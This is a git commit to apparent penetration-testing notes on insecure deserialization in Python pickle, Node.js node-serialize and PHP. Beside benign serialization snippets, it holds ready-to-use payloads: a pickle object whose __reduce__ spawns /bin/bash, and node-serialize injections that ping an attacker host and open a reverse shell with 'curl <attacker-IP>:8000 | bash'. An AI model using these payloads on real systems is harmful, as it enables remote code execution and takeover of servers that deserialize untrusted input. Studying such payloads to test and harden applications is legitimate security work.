details on pickle and php serialize

This commit is contained in:
gurkenhabicht 2024-05-07 21:38:46 +02:00
parent 815f0cdae6
commit 6734e25c2d
3 changed files with 52 additions and 5 deletions

View File

@ -1,7 +1,25 @@
# Pickle
Serializes a Python object into a byte stream an back.
When sending pickled data through a network do base64 encoding first to prevent
special characters to do something unexpected.
```python
import pickle
import base64
text = "Hello, World!"
pickled = pickle.dumps(text)
send_data = base64.b64encode(pickled)
receive_data = base64.b64decode(send_data)
unpickled = pickle.loads(pickled)
```
## Payload
* Inject payload
The following payload can be injected into a pickled object.
```python
import pickle
import os
@ -10,12 +28,12 @@ class evil_object(object):
def __reduce__(self):
return(os.system, ('/bin/bash',))
x = evil_object()
x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)
```
* Dump serialized object via
```python
pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
```

View File

@ -5,10 +5,13 @@
## Example Payloads
* Encode, send and wait with `sudo tcpdump -i <interface> icmp`
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
* reverse shell via
Reverse shell via
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```

View File

@ -1,8 +1,34 @@
# Unserialize
# PHP (De-)Serialization
A basic example of (de-)serialization is the following
Serialize is show in the following snippet.
```php
<?php
$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
$serialized = serialize($plain_text);
file_put_contents('serialized.txt', $serialized);
?>
```
Deserialize is done in the following snippet.
```php
<?php
$serialized = file_get_contents('serialized.txt');
$plain_text = unserialize($serialized);
echo "Title: " . $plain_text['title'];
echo "Content: " . $plain_text['content'];
?>
```
## Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
* Serialize via
Serialize a form on a website through PHP via
```php
<?php
class FormSubmit {